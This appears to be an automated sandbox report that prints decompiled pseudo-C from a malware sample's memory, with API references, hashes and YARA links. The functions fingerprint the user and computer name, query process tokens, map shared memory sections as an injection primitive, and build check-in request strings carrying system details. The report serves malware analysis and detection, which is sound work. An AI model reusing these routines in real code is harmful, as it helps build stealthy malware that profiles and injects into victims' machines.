Opcode Fuzzy Hash: fa1ee72ffcd87df28d4980db385e47b2fea2ca39d0f496df63b7363508c87dfc
Instruction Fuzzy Hash: 143150B5902129BFF701EFB5CCC89DF7BACEB092D47118526F905D2158E7309E419BA1

Uniqueness

Uniqueness Score: -1.00%

Function 00CF5DC6, Relevance: 12.1, APIs: 8, Instructions: 103
memoryCOMMON

Download Yara Rule

C-Code - Quality: 96%

			E00CF5DC6(char __eax, void* __esi) {
				long _v8;
				char _v12;
				signed int _v16;
				signed int _v20;
				signed int _v28;
				long _t34;
				signed int _t39;
				long _t50;
				char _t59;
				intOrPtr _t61;
				void* _t62;
				void* _t64;
				char _t65;
				intOrPtr* _t67;
				void* _t68;
				void* _t69;

				_t69 = __esi;
				_t65 = __eax;
				_v8 = 0;
				_v12 = __eax;
				if(__eax == 0) {
					_t59 =  *0xcfd270; // 0xd448b889
					_v12 = _t59;
				}
				_t64 = _t69;
				E00CF60BE( &_v12, _t64);
				if(_t65 != 0) {
					 *_t69 =  *_t69 ^  *0xcfd2a0 ^ 0x4c0ca0ae;
				} else {
					GetUserNameW(0,  &_v8); // executed
					_t50 = _v8;
					if(_t50 != 0) {
						_t62 = RtlAllocateHeap( *0xcfd238, 0, _t50 + _t50);
						if(_t62 != 0) {
							if(GetUserNameW(_t62,  &_v8) != 0) {
								_t64 = _t62;
								 *_t69 =  *_t69 ^ E00CF4D95(_v8 + _v8, _t64);
							}
							HeapFree( *0xcfd238, 0, _t62);
						}
					}
				}
				_t61 = __imp__;
				_v8 = _v8 & 0x00000000;
				GetComputerNameW(0,  &_v8);
				_t34 = _v8;
				if(_t34 != 0) {
					_t68 = RtlAllocateHeap( *0xcfd238, 0, _t34 + _t34);
					if(_t68 != 0) {
						if(GetComputerNameW(_t68,  &_v8) != 0) {
							_t64 = _t68;
							 *(_t69 + 0xc) =  *(_t69 + 0xc) ^ E00CF4D95(_v8 + _v8, _t64);
						}
						HeapFree( *0xcfd238, 0, _t68);
					}
				}
				asm("cpuid");
				_t67 =  &_v28;
				 *_t67 = 1;
				 *((intOrPtr*)(_t67 + 4)) = _t61;
				 *((intOrPtr*)(_t67 + 8)) = 0;
				 *(_t67 + 0xc) = _t64;
				_t39 = _v16 ^ _v20 ^ _v28;
				 *(_t69 + 4) =  *(_t69 + 4) ^ _t39;
				return _t39;
			}

0x00cf5dc6
0x00cf5dce
0x00cf5dd2
0x00cf5dd5
0x00cf5dda
0x00cf5ddc
0x00cf5de1
0x00cf5de1
0x00cf5de7
0x00cf5de9
0x00cf5df6
0x00cf5e57
0x00cf5df8
0x00cf5dfd
0x00cf5e03
0x00cf5e08
0x00cf5e16
0x00cf5e1a
0x00cf5e29
0x00cf5e30
0x00cf5e37
0x00cf5e37
0x00cf5e42
0x00cf5e42
0x00cf5e1a
0x00cf5e08
0x00cf5e59
0x00cf5e5f
0x00cf5e69
0x00cf5e6b
0x00cf5e70
0x00cf5e7f
0x00cf5e83
0x00cf5e8e
0x00cf5e95
0x00cf5e9c
0x00cf5e9c
0x00cf5ea8
0x00cf5ea8
0x00cf5e83
0x00cf5eb3
0x00cf5eb5
0x00cf5eb8
0x00cf5eba
0x00cf5ebd
0x00cf5ec0
0x00cf5eca
0x00cf5ece
0x00cf5ed2

APIs

GetUserNameW.ADVAPI32(00000000,?), ref: 00CF5DFD
RtlAllocateHeap.NTDLL(00000000,?), ref: 00CF5E14
GetUserNameW.ADVAPI32(00000000,?), ref: 00CF5E21
HeapFree.KERNEL32(00000000,00000000,?,?,?,?,00CF5063), ref: 00CF5E42
GetComputerNameW.KERNEL32(00000000,00000000), ref: 00CF5E69
RtlAllocateHeap.NTDLL(00000000,00000000), ref: 00CF5E7D
GetComputerNameW.KERNEL32(00000000,00000000), ref: 00CF5E8A
HeapFree.KERNEL32(00000000,00000000,?,?,?,?,00CF5063), ref: 00CF5EA8

Memory Dump Source

Source File: 00000001.00000002.590618455.0000000000CF1000.00000020.00000001.sdmp, Offset: 00CF0000, based on PE: true

Associated: 00000001.00000002.590606715.0000000000CF0000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.590635246.0000000000CFC000.00000002.00000001.sdmp Download File
Associated: 00000001.00000002.590650801.0000000000CFD000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.590659587.0000000000CFF000.00000002.00000001.sdmp Download File

Similarity

API ID: HeapName$AllocateComputerFreeUser
String ID:
API String ID: 3239747167-0
Opcode ID: 5e33fbab79950be44532fe060b0916e19dd732b95547beb19aac35d6d3562d28
Instruction ID: 31f7a3e76c3e761ba77cd6f1c4191d09ed1f56ce8b701c298ba1db20ce815920
Opcode Fuzzy Hash: 5e33fbab79950be44532fe060b0916e19dd732b95547beb19aac35d6d3562d28
Instruction Fuzzy Hash: 08310972A00609EFDB50DF69DD81BBEB7FAEB44300F214469E615D6220DB30DE01DB52

Uniqueness

Uniqueness Score: -1.00%

Function 00CF9932, Relevance: 10.6, APIs: 7, Instructions: 81
nativeCOMMON

Download Yara Rule

C-Code - Quality: 38%

			E00CF9932(char _a4, void* _a8) {
				void* _v8;
				void* _v12;
				char _v16;
				void* _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				void* _v44;
				void** _t33;
				void* _t40;
				void* _t43;
				void** _t44;
				intOrPtr* _t47;
				char _t48;

				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v20 = _a4;
				_t48 = 0;
				_v16 = 0;
				_a4 = 0;
				_v44 = 0x18;
				_v40 = 0;
				_v32 = 0;
				_v36 = 0;
				_v28 = 0;
				_v24 = 0;
				if(NtOpenProcess( &_v12, 0x400,  &_v44,  &_v20) >= 0) {
					_t33 =  &_v8;
					__imp__(_v12, 8, _t33);
					if(_t33 >= 0) {
						_t47 = __imp__;
						 *_t47(_v8, 1, 0, 0,  &_a4, _t43); // executed
						_t44 = E00CF8D59(_a4);
						if(_t44 != 0) {
							_t40 =  *_t47(_v8, 1, _t44, _a4,  &_a4); // executed
							if(_t40 >= 0) {
								memcpy(_a8,  *_t44, 0x1c);
								_t48 = 1;
							}
							E00CF677C(_t44);
						}
						NtClose(_v8); // executed
					}
					NtClose(_v12);
				}
				return _t48;
			}

0x00cf993f
0x00cf9940
0x00cf9941
0x00cf9942
0x00cf9943
0x00cf9947
0x00cf994e
0x00cf995d
0x00cf9960
0x00cf9963
0x00cf996a
0x00cf996d
0x00cf9970
0x00cf9973
0x00cf9976
0x00cf9981
0x00cf9983
0x00cf998c
0x00cf9994
0x00cf9996
0x00cf99a8
0x00cf99b2
0x00cf99b6
0x00cf99c5
0x00cf99c9
0x00cf99d2
0x00cf99da
0x00cf99da
0x00cf99dc
0x00cf99dc
0x00cf99e4
0x00cf99ea
0x00cf99ee
0x00cf99ee
0x00cf99f9

APIs

NtOpenProcess.NTDLL(00000000,00000400,?,?), ref: 00CF9979
NtOpenProcessToken.NTDLL(00000000,00000008,?), ref: 00CF998C
NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,00000000), ref: 00CF99A8

Part of subcall function 00CF8D59: RtlAllocateHeap.NTDLL(00000000,00000000,00CF9099), ref: 00CF8D65

NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,00000000), ref: 00CF99C5
memcpy.NTDLL(00000000,00000000,0000001C), ref: 00CF99D2
NtClose.NTDLL(?), ref: 00CF99E4
NtClose.NTDLL(00000000), ref: 00CF99EE

Memory Dump Source

Source File: 00000001.00000002.590618455.0000000000CF1000.00000020.00000001.sdmp, Offset: 00CF0000, based on PE: true

Associated: 00000001.00000002.590606715.0000000000CF0000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.590635246.0000000000CFC000.00000002.00000001.sdmp Download File
Associated: 00000001.00000002.590650801.0000000000CFD000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.590659587.0000000000CFF000.00000002.00000001.sdmp Download File

Similarity

API ID: Token$CloseInformationOpenProcessQuery$AllocateHeapmemcpy
String ID:
API String ID: 2575439697-0
Opcode ID: 368b7b6ed647dcd4a6fa252757097b86962e9875197eece12966fd24e5c9f744
Instruction ID: 2b4598a0fdb77e0e37798be4277914d2c18a3e85e4da1e1f52538698b03799ee
Opcode Fuzzy Hash: 368b7b6ed647dcd4a6fa252757097b86962e9875197eece12966fd24e5c9f744
Instruction Fuzzy Hash: 3F210771A0011CBBDF01AF95CD85AEEBFBDEF08740F104016F605E6160D7B18A54EBA1

Uniqueness

Uniqueness Score: -1.00%

Function 10001DD0, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 70
nativeCOMMON

Download Yara Rule

C-Code - Quality: 72%

			E10001DD0(intOrPtr* __eax, void** _a4) {
				int _v12;
				void* _v16;
				void* _v20;
				void* _v24;
				int _v28;
				int _v32;
				intOrPtr _v36;
				int _v40;
				int _v44;
				void* _v48;
				void* __esi;
				long _t34;
				void* _t39;
				void* _t47;
				intOrPtr* _t48;

				_t48 = __eax;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v24 =  *((intOrPtr*)(__eax + 4));
				_v16 = 0;
				_v12 = 0;
				_v48 = 0x18;
				_v44 = 0;
				_v36 = 0x40;
				_v40 = 0;
				_v32 = 0;
				_v28 = 0;
				_t34 = NtCreateSection( &_v16, 0xf001f,  &_v48,  &_v24,  *(__eax + 8), 0x8000000, 0);
				if(_t34 < 0) {
					_t47 =  *((intOrPtr*)(_t48 + 0x18))(_t34);
				} else {
					 *_t48 = _v16;
					_t39 = E10001812(_t48,  &_v12); // executed
					_t47 = _t39;
					if(_t47 != 0) {
						 *((intOrPtr*)(_t48 + 0x1c))(_v16);
					} else {
						memset(_v12, 0, _v24);
						 *_a4 = _v12;
					}
				}
				return _t47;
			}

0x10001dd9
0x10001de0
0x10001de1
0x10001de2
0x10001de3
0x10001de4
0x10001df5
0x10001df9
0x10001e0d
0x10001e10
0x10001e13
0x10001e1a
0x10001e1d
0x10001e24
0x10001e27
0x10001e2a
0x10001e2d
0x10001e32
0x10001e6d
0x10001e34
0x10001e37
0x10001e3d
0x10001e42
0x10001e46
0x10001e64
0x10001e48
0x10001e4f
0x10001e5d
0x10001e5d
0x10001e46
0x10001e75

APIs

NtCreateSection.NTDLL(?,000F001F,?,?,?,08000000,00000000,74B04EE0,00000000,00000000,?), ref: 10001E2D

Part of subcall function 10001812: NtMapViewOfSection.NTDLL(00000000,000000FF,?,00000000,00000000,?,10001E42,00000002,00000000,?,?,00000000,?,?,10001E42,00000002), ref: 1000183F

memset.NTDLL ref: 10001E4F

Strings

@, xrefs: 10001E1D

Memory Dump Source

Source File: 00000001.00000002.593901032.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000001.00000002.593964557.0000000010005000.00000040.00000001.sdmp Download File

Similarity

API ID: Section$CreateViewmemset
String ID: @
API String ID: 2533685722-2766056989
Opcode ID: 6a036c25c3596289e1496aeb05bd05d7099d0fc69dd2c6ace39beb277248278c
Instruction ID: a7ee5fb51198b84d194c3a9f3c529b392fcfabc5d3c13dd4e92119350f342c38
Opcode Fuzzy Hash: 6a036c25c3596289e1496aeb05bd05d7099d0fc69dd2c6ace39beb277248278c
Instruction Fuzzy Hash: 1C210BB6D00209AFDB11CFA9C8849DEFBB9EB48294F508429E605F7210D730AA448B60

Uniqueness

Uniqueness Score: -1.00%

Function 10001812, Relevance: 1.5, APIs: 1, Instructions: 34
nativeCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E10001812(void** __esi, PVOID* _a4) {
				long _v8;
				void* _v12;
				void* _v16;
				long _t13;

				_v16 = 0;
				asm("stosd");
				_v8 = 0;
				_t13 = NtMapViewOfSection( *__esi, 0xffffffff, _a4, 0, 0,  &_v16,  &_v8, 2, 0, __esi[2]);
				if(_t13 < 0) {
					_push(_t13);
					return __esi[6]();
				}
				return 0;
			}

0x10001824
0x1000182a
0x10001838
0x1000183f
0x10001844
0x1000184a
0x00000000
0x1000184b
0x00000000

APIs

NtMapViewOfSection.NTDLL(00000000,000000FF,?,00000000,00000000,?,10001E42,00000002,00000000,?,?,00000000,?,?,10001E42,00000002), ref: 1000183F

Memory Dump Source

Source File: 00000001.00000002.593901032.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000001.00000002.593964557.0000000010005000.00000040.00000001.sdmp Download File

Similarity

API ID: SectionView
String ID:
API String ID: 1323581903-0
Opcode ID: 5dd26fff624a50198c0bd826f45a2e4ef6e885f587514f0e64cb0fed618db76f
Instruction ID: 6d1e1847bffdb7ea578f335206b8a95dbb6c7942dd4018a96a037df7c49ea5ed
Opcode Fuzzy Hash: 5dd26fff624a50198c0bd826f45a2e4ef6e885f587514f0e64cb0fed618db76f
Instruction Fuzzy Hash: 8BF030B690020DFFEB119FA5CC85CDFBBBDEB44394B108939F552E2095DA309E089B60

Uniqueness

Uniqueness Score: -1.00%

Function 00CF1D4C, Relevance: 34.7, APIs: 23, Instructions: 204
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 66%

			E00CF1D4C(long __eax, void* __ecx, void* __edx, intOrPtr _a12, void* _a16, void* _a24, intOrPtr _a32) {
				intOrPtr _v0;
				intOrPtr _v4;
				intOrPtr _v20;
				intOrPtr _v28;
				intOrPtr _v32;
				void* _v48;
				intOrPtr _v56;
				void* __edi;
				long _t26;
				intOrPtr _t27;
				intOrPtr _t28;
				intOrPtr _t29;
				intOrPtr _t30;
				intOrPtr _t31;
				void* _t34;
				intOrPtr _t35;
				int _t38;
				void* _t39;
				intOrPtr _t43;
				intOrPtr _t44;
				intOrPtr _t51;
				intOrPtr _t55;
				intOrPtr* _t57;
				intOrPtr _t63;
				intOrPtr _t65;
				intOrPtr _t71;
				intOrPtr _t74;
				intOrPtr _t77;
				int _t80;
				intOrPtr _t81;
				int _t84;
				intOrPtr _t86;
				int _t89;
				intOrPtr* _t92;
				intOrPtr* _t93;
				void* _t94;
				void* _t98;
				void* _t99;
				void* _t100;
				intOrPtr _t101;
				void* _t103;
				int _t104;
				void* _t105;
				void* _t106;
				void* _t108;
				void* _t109;
				void* _t111;

				_t98 = __edx;
				_t94 = __ecx;
				_t26 = __eax;
				_t108 = _a16;
				_v4 = 8;
				if(__eax == 0) {
					_t26 = GetTickCount();
				}
				_t27 =  *0xcfd018; // 0xd5dd08ab
				asm("bswap eax");
				_t28 =  *0xcfd014; // 0x3a87c8cd
				asm("bswap eax");
				_t29 =  *0xcfd010; // 0xd8d2f808
				asm("bswap eax");
				_t30 =  *0xcfd00c; // 0xeec43f25
				asm("bswap eax");
				_t31 =  *0xcfd2a4; // 0x247a5a8
				_t3 = _t31 + 0xcfe633; // 0x74666f73
				_t104 = wsprintfA(_t108, _t3, 2, 0x3d13b, _t30, _t29, _t28, _t27,  *0xcfd02c,  *0xcfd004, _t26);
				_t34 = E00CF6B47();
				_t35 =  *0xcfd2a4; // 0x247a5a8
				_t4 = _t35 + 0xcfe673; // 0x74707526
				_t38 = wsprintfA(_t104 + _t108, _t4, _t34);
				_t111 = _t109 + 0x38;
				_t105 = _t104 + _t38; // executed
				_t39 = E00CF6111(_t94); // executed
				_t99 = _t39;
				if(_t99 != 0) {
					_t86 =  *0xcfd2a4; // 0x247a5a8
					_t6 = _t86 + 0xcfe8eb; // 0x736e6426
					_t89 = wsprintfA(_t105 + _t108, _t6, _t99);
					_t111 = _t111 + 0xc;
					_t105 = _t105 + _t89;
					HeapFree( *0xcfd238, 0, _t99);
				}
				_t100 = E00CF26A0();
				if(_t100 != 0) {
					_t81 =  *0xcfd2a4; // 0x247a5a8
					_t8 = _t81 + 0xcfe8f3; // 0x6f687726
					_t84 = wsprintfA(_t105 + _t108, _t8, _t100);
					_t111 = _t111 + 0xc;
					_t105 = _t105 + _t84;
					HeapFree( *0xcfd238, 0, _t100);
				}
				_t101 =  *0xcfd324; // 0x31795b0
				_a32 = E00CF1B77(0xcfd00a, _t101 + 4);
				_t43 =  *0xcfd2cc; // 0x0
				if(_t43 != 0) {
					_t77 =  *0xcfd2a4; // 0x247a5a8
					_t11 = _t77 + 0xcfe8cd; // 0x3d736f26
					_t80 = wsprintfA(_t105 + _t108, _t11, _t43);
					_t111 = _t111 + 0xc;
					_t105 = _t105 + _t80;
				}
				_t44 =  *0xcfd2c8; // 0x0
				if(_t44 != 0) {
					_t74 =  *0xcfd2a4; // 0x247a5a8
					_t13 = _t74 + 0xcfe8c6; // 0x3d706926
					wsprintfA(_t105 + _t108, _t13, _t44);
				}
				if(_a32 != 0) {
					_t103 = RtlAllocateHeap( *0xcfd238, 0, 0x800);
					if(_t103 != 0) {
						E00CF1BE3(GetTickCount());
						_t51 =  *0xcfd324; // 0x31795b0
						__imp__(_t51 + 0x40);
						asm("lock xadd [eax], ecx");
						_t55 =  *0xcfd324; // 0x31795b0
						__imp__(_t55 + 0x40);
						_t57 =  *0xcfd324; // 0x31795b0
						_t106 = E00CF1A30(1, _t98, _t108,  *_t57);
						asm("lock xadd [eax], ecx");
						if(_t106 != 0) {
							StrTrimA(_t106, 0xcfc2a4);
							_t63 =  *0xcfd2a4; // 0x247a5a8
							_push(_t106);
							_t15 = _t63 + 0xcfe252; // 0x616d692f
							_t65 = E00CF2773(_t15);
							_v20 = _t65;
							if(_t65 != 0) {
								_t92 = __imp__;
								 *_t92(_t106, _v4);
								 *_t92(_t103, _v0);
								_t93 = __imp__;
								 *_t93(_t103, _v32);
								 *_t93(_t103, _t106);
								_t71 = E00CF32F0(0xffffffffffffffff, _t103, _v32, _v28); // executed
								_v56 = _t71;
								if(_t71 != 0 && _t71 != 0x10d2) {
									E00CF5BEA();
								}
								HeapFree( *0xcfd238, 0, _v48);
							}
							HeapFree( *0xcfd238, 0, _t106);
						}
						HeapFree( *0xcfd238, 0, _t103);
					}
					HeapFree( *0xcfd238, 0, _a24);
				}
				HeapFree( *0xcfd238, 0, _t108);
				return _a12;
			}

0x00cf1d4c
0x00cf1d4c
0x00cf1d4c
0x00cf1d51
0x00cf1d57
0x00cf1d61
0x00cf1d63
0x00cf1d63
0x00cf1d70
0x00cf1d7b
0x00cf1d7e
0x00cf1d89
0x00cf1d8c
0x00cf1d91
0x00cf1d94
0x00cf1d99
0x00cf1d9c
0x00cf1da8
0x00cf1db5
0x00cf1db7
0x00cf1dbd
0x00cf1dc2
0x00cf1dcd
0x00cf1dcf
0x00cf1dd2
0x00cf1dd4
0x00cf1dd9
0x00cf1ddd
0x00cf1ddf
0x00cf1de4
0x00cf1df0
0x00cf1df2
0x00cf1dfe
0x00cf1e00
0x00cf1e00
0x00cf1e0b
0x00cf1e0f
0x00cf1e11
0x00cf1e16
0x00cf1e22
0x00cf1e24
0x00cf1e30
0x00cf1e32
0x00cf1e32
0x00cf1e38
0x00cf1e4b
0x00cf1e4f
0x00cf1e56
0x00cf1e59
0x00cf1e5e
0x00cf1e69
0x00cf1e6b
0x00cf1e6e
0x00cf1e6e
0x00cf1e70
0x00cf1e77
0x00cf1e7a
0x00cf1e7f
0x00cf1e89
0x00cf1e8b
0x00cf1e93
0x00cf1eac
0x00cf1eb0
0x00cf1ebc
0x00cf1ec1
0x00cf1eca
0x00cf1edb
0x00cf1edf
0x00cf1ee8
0x00cf1eee
0x00cf1efb
0x00cf1f08
0x00cf1f0e
0x00cf1f1a
0x00cf1f20
0x00cf1f25
0x00cf1f26
0x00cf1f2d
0x00cf1f32
0x00cf1f38
0x00cf1f3e
0x00cf1f45
0x00cf1f4c
0x00cf1f52
0x00cf1f59
0x00cf1f5d
0x00cf1f68
0x00cf1f6d
0x00cf1f73
0x00cf1f7c
0x00cf1f7c
0x00cf1f8d
0x00cf1f8d
0x00cf1f9c
0x00cf1f9c
0x00cf1fab
0x00cf1fab
0x00cf1fbd
0x00cf1fbd
0x00cf1fcc
0x00cf1fdd

APIs

GetTickCount.KERNEL32 ref: 00CF1D63
wsprintfA.USER32 ref: 00CF1DB0
wsprintfA.USER32 ref: 00CF1DCD
wsprintfA.USER32 ref: 00CF1DF0
HeapFree.KERNEL32(00000000,00000000), ref: 00CF1E00
wsprintfA.USER32 ref: 00CF1E22
HeapFree.KERNEL32(00000000,00000000), ref: 00CF1E32
wsprintfA.USER32 ref: 00CF1E69
wsprintfA.USER32 ref: 00CF1E89
RtlAllocateHeap.NTDLL(00000000,00000800), ref: 00CF1EA6
GetTickCount.KERNEL32 ref: 00CF1EB6
RtlEnterCriticalSection.NTDLL(03179570), ref: 00CF1ECA
RtlLeaveCriticalSection.NTDLL(03179570), ref: 00CF1EE8

Part of subcall function 00CF1A30: lstrlen.KERNEL32(00000000,253D7325,00000000,00000000,7742C740,?,?,00CF1EFB,?,031795B0), ref: 00CF1A5B
Part of subcall function 00CF1A30: lstrlen.KERNEL32(?,?,?,00CF1EFB,?,031795B0), ref: 00CF1A63
Part of subcall function 00CF1A30: strcpy.NTDLL ref: 00CF1A7A
Part of subcall function 00CF1A30: lstrcat.KERNEL32(00000000,?), ref: 00CF1A85
Part of subcall function 00CF1A30: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,00CF1EFB,?,031795B0), ref: 00CF1AA2

StrTrimA.SHLWAPI(00000000,00CFC2A4,?,031795B0), ref: 00CF1F1A

Part of subcall function 00CF2773: lstrlen.KERNEL32(?,00000000,00000000,00CF1F32,616D692F,00000000), ref: 00CF277F
Part of subcall function 00CF2773: lstrlen.KERNEL32(?), ref: 00CF2787
Part of subcall function 00CF2773: lstrcpy.KERNEL32(00000000,?), ref: 00CF279E
Part of subcall function 00CF2773: lstrcat.KERNEL32(00000000,?), ref: 00CF27A9

lstrcpy.KERNEL32(00000000,?), ref: 00CF1F45
lstrcpy.KERNEL32(00000000,00000000), ref: 00CF1F4C
lstrcat.KERNEL32(00000000,?), ref: 00CF1F59
lstrcat.KERNEL32(00000000,00000000), ref: 00CF1F5D

Part of subcall function 00CF32F0: WaitForSingleObject.KERNEL32(00000000,00000000,00000000,74B481D0), ref: 00CF33A2

HeapFree.KERNEL32(00000000,?,00000000,?,?), ref: 00CF1F8D
HeapFree.KERNEL32(00000000,00000000,616D692F,00000000), ref: 00CF1F9C
HeapFree.KERNEL32(00000000,00000000,?,031795B0), ref: 00CF1FAB
HeapFree.KERNEL32(00000000,00000000), ref: 00CF1FBD
HeapFree.KERNEL32(00000000,?), ref: 00CF1FCC

Memory Dump Source

Source File: 00000001.00000002.590618455.0000000000CF1000.00000020.00000001.sdmp, Offset: 00CF0000, based on PE: true

Associated: 00000001.00000002.590606715.0000000000CF0000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.590635246.0000000000CFC000.00000002.00000001.sdmp Download File
Associated: 00000001.00000002.590650801.0000000000CFD000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.590659587.0000000000CFF000.00000002.00000001.sdmp Download File

Similarity

API ID: Heap$Free$wsprintf$lstrcatlstrlen$lstrcpy$CountCriticalSectionTickTrim$AllocateEnterLeaveObjectSingleWaitstrcpy
String ID:
API String ID: 3080378247-0
Opcode ID: 2fc18b53d123d1ee5bda885ca3c53f49124ef6f186795366710876719e0fd1f2
Instruction ID: e59de09fd9392ff907e5a7c9699ad4bdeed6e8961744b6f47bbabfe8b3aae21d
Opcode Fuzzy Hash: 2fc18b53d123d1ee5bda885ca3c53f49124ef6f186795366710876719e0fd1f2
Instruction Fuzzy Hash: C9616E71600209EFC711AB68ED88F7E77A9EB48350F160114FA0AD7271DB35E906DBA7

Uniqueness

Uniqueness Score: -1.00%

Function 00CF12C4, Relevance: 33.2, APIs: 22, Instructions: 248
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 74%

			E00CF12C4(long __eax, void* __ecx, void* __edx, intOrPtr _a4, char** _a8, int* _a12, void* _a16) {
				void* _v8;
				signed int _v12;
				void* _v16;
				void* _v20;
				void* _v24;
				void* _v28;
				void* __ebx;
				void* __edi;
				long _t60;
				intOrPtr _t61;
				intOrPtr _t62;
				intOrPtr _t63;
				intOrPtr _t64;
				intOrPtr _t65;
				void* _t68;
				intOrPtr _t69;
				int _t72;
				void* _t73;
				void* _t74;
				void* _t76;
				void* _t79;
				intOrPtr _t83;
				intOrPtr _t87;
				intOrPtr* _t89;
				intOrPtr _t95;
				void* _t97;
				intOrPtr _t104;
				signed int _t108;
				char** _t110;
				int _t113;
				signed int _t115;
				intOrPtr* _t116;
				intOrPtr* _t118;
				intOrPtr* _t120;
				intOrPtr* _t122;
				intOrPtr _t125;
				intOrPtr _t130;
				int _t134;
				CHAR* _t136;
				intOrPtr _t137;
				void* _t138;
				void* _t147;
				int _t148;
				void* _t149;
				intOrPtr _t150;
				void* _t152;
				long _t156;
				intOrPtr* _t157;
				intOrPtr* _t158;
				intOrPtr* _t161;
				void* _t162;
				void* _t164;

				_t147 = __edx;
				_t138 = __ecx;
				_t60 = __eax;
				_v12 = 8;
				if(__eax == 0) {
					_t60 = GetTickCount();
				}
				_t61 =  *0xcfd018; // 0xd5dd08ab
				asm("bswap eax");
				_t62 =  *0xcfd014; // 0x3a87c8cd
				_t136 = _a16;
				asm("bswap eax");
				_t63 =  *0xcfd010; // 0xd8d2f808
				asm("bswap eax");
				_t64 =  *0xcfd00c; // 0xeec43f25
				asm("bswap eax");
				_t65 =  *0xcfd2a4; // 0x247a5a8
				_t3 = _t65 + 0xcfe633; // 0x74666f73
				_t148 = wsprintfA(_t136, _t3, 3, 0x3d13b, _t64, _t63, _t62, _t61,  *0xcfd02c,  *0xcfd004, _t60);
				_t68 = E00CF6B47();
				_t69 =  *0xcfd2a4; // 0x247a5a8
				_t4 = _t69 + 0xcfe673; // 0x74707526
				_t72 = wsprintfA(_t148 + _t136, _t4, _t68);
				_t164 = _t162 + 0x38;
				_t149 = _t148 + _t72; // executed
				_t73 = E00CF6111(_t138); // executed
				_t137 = __imp__;
				_v8 = _t73;
				if(_t73 != 0) {
					_t130 =  *0xcfd2a4; // 0x247a5a8
					_t7 = _t130 + 0xcfe8eb; // 0x736e6426
					_t134 = wsprintfA(_a16 + _t149, _t7, _t73);
					_t164 = _t164 + 0xc;
					_t149 = _t149 + _t134;
					HeapFree( *0xcfd238, 0, _v8);
				}
				_t74 = E00CF26A0();
				_v8 = _t74;
				if(_t74 != 0) {
					_t125 =  *0xcfd2a4; // 0x247a5a8
					_t11 = _t125 + 0xcfe8f3; // 0x6f687726
					wsprintfA(_t149 + _a16, _t11, _t74);
					_t164 = _t164 + 0xc;
					HeapFree( *0xcfd238, 0, _v8);
				}
				_t150 =  *0xcfd324; // 0x31795b0
				_t76 = E00CF1B77(0xcfd00a, _t150 + 4);
				_t156 = 0;
				_v20 = _t76;
				if(_t76 == 0) {
					L26:
					RtlFreeHeap( *0xcfd238, _t156, _a16); // executed
					return _v12;
				} else {
					_t79 = RtlAllocateHeap( *0xcfd238, 0, 0x800);
					_v8 = _t79;
					if(_t79 == 0) {
						L25:
						HeapFree( *0xcfd238, _t156, _v20);
						goto L26;
					}
					E00CF1BE3(GetTickCount());
					_t83 =  *0xcfd324; // 0x31795b0
					__imp__(_t83 + 0x40);
					asm("lock xadd [eax], ecx");
					_t87 =  *0xcfd324; // 0x31795b0
					__imp__(_t87 + 0x40);
					_t89 =  *0xcfd324; // 0x31795b0
					_t152 = E00CF1A30(1, _t147, _a16,  *_t89);
					_v28 = _t152;
					asm("lock xadd [eax], ecx");
					if(_t152 == 0) {
						L24:
						RtlFreeHeap( *0xcfd238, _t156, _v8); // executed
						goto L25;
					}
					StrTrimA(_t152, 0xcfc2a4);
					_t95 =  *0xcfd2a4; // 0x247a5a8
					_push(_t152);
					_t18 = _t95 + 0xcfe252; // 0x616d692f
					_t97 = E00CF2773(_t18);
					_v16 = _t97;
					if(_t97 == 0) {
						L23:
						RtlFreeHeap( *0xcfd238, _t156, _t152); // executed
						goto L24;
					}
					_t157 = __imp__;
					 *_t157(_t152, _a4);
					 *_t157(_v8, _v20);
					_t158 = __imp__;
					 *_t158(_v8, _v16);
					 *_t158(_v8, _t152);
					_t104 = E00CF978C(0, _v8);
					_a4 = _t104;
					if(_t104 == 0) {
						_v12 = 8;
						L21:
						E00CF5BEA();
						L22:
						HeapFree( *0xcfd238, 0, _v16);
						_t156 = 0;
						goto L23;
					}
					_t108 = E00CFA523(_t137, 0xffffffffffffffff, _t152,  &_v24); // executed
					_v12 = _t108;
					if(_t108 == 0) {
						_t161 = _v24;
						_t115 = E00CF9561(_t161, _a4, _a8, _a12); // executed
						_v12 = _t115;
						_t116 =  *((intOrPtr*)(_t161 + 8));
						 *((intOrPtr*)( *_t116 + 0x80))(_t116);
						_t118 =  *((intOrPtr*)(_t161 + 8));
						 *((intOrPtr*)( *_t118 + 8))(_t118);
						_t120 =  *((intOrPtr*)(_t161 + 4));
						 *((intOrPtr*)( *_t120 + 8))(_t120);
						_t122 =  *_t161;
						 *((intOrPtr*)( *_t122 + 8))(_t122);
						E00CF677C(_t161);
					}
					if(_v12 != 0x10d2) {
						L16:
						if(_v12 == 0) {
							_t110 = _a8;
							if(_t110 != 0) {
								_t153 =  *_t110;
								_t159 =  *_a12;
								wcstombs( *_t110,  *_t110,  *_a12);
								_t113 = E00CF6221(_t153, _t153, _t159 >> 1);
								_t152 = _v28;
								 *_a12 = _t113;
							}
						}
						goto L19;
					} else {
						if(_a8 != 0) {
							L19:
							E00CF677C(_a4);
							if(_v12 == 0 || _v12 == 0x10d2) {
								goto L22;
							} else {
								goto L21;
							}
						}
						_v12 = _v12 & 0x00000000;
						goto L16;
					}
				}
			}

0x00cf12c4
0x00cf12c4
0x00cf12c4
0x00cf12cd
0x00cf12d6
0x00cf12d8
0x00cf12d8
0x00cf12e5
0x00cf12f0
0x00cf12f3
0x00cf12f8
0x00cf1301
0x00cf1304
0x00cf1309
0x00cf130c
